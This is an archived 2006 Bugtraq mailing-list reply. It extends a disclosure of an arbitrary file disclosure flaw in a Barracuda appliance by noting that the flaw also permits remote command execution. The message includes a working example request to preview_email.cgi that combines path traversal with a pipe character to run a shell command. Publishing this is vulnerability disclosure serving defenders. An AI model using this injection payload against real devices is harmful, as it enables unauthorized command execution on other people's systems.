Bugtraq: Re: Barracuda Vulnerability: Arbitrary File Disclosure [NNL-20060801-02]

Nmap Security Scanner

Intro

Ref Guide

Install Guide

Download

Changelog

Book

Docs
Security Lists

Bugtraq

Basics

More
Security Tools

More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

Bugtraq mailing list archives

Re: Barracuda Vulnerability: Arbitrary File Disclosure [NNL-20060801-02]

From: Matthew Hall <lists () ecsc co uk>
Date: Thu, 03 Aug 2006 17:01:01 +0100

gssincla () nnlsoftware com wrote:

Title: Barracuda Arbitrary File Disclosure


This vulnerability doesn't just allow arbitrary file disclosure, but
also allows remote execution of commands through use of the pipe
characher (|), e.g:

https://<deviceIP>/cgi-bin/preview_email.cgi?file=/mail/mlog/../../bin/ls%20/|

Regards,
Matt

By Date By Thread

Current thread:

Barracuda Vulnerability: Arbitrary File Disclosure [NNL-20060801-02] gssincla (Aug 01)
- Re: Barracuda Vulnerability: Arbitrary File Disclosure [NNL-20060801-02] Matthew Hall (Aug 03)